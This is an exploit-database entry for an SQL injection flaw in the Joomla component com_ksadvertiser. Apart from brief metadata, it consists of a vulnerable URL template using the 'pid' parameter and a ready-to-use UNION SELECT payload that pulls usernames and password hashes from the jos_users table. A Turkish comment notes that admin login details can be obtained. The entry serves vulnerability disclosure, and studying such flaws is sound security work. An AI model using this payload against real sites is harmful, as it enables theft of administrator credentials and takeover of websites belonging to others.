Joomla Component com_ksadvertiser SQL Injection Vulnerability

2010-01-08T00:00:00
ID 1337DAY-ID-10642
Type zdt
Reporter Fl0riX
Modified 2010-01-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Joomla Component com_ksadvertiser SQL Injection Vulnerability
=============================================================


########################################################################
#        Joomla Component com_ksadvertiser SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_ksadvertiser
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
########################################################################



#  0day.today [2018-01-05]  #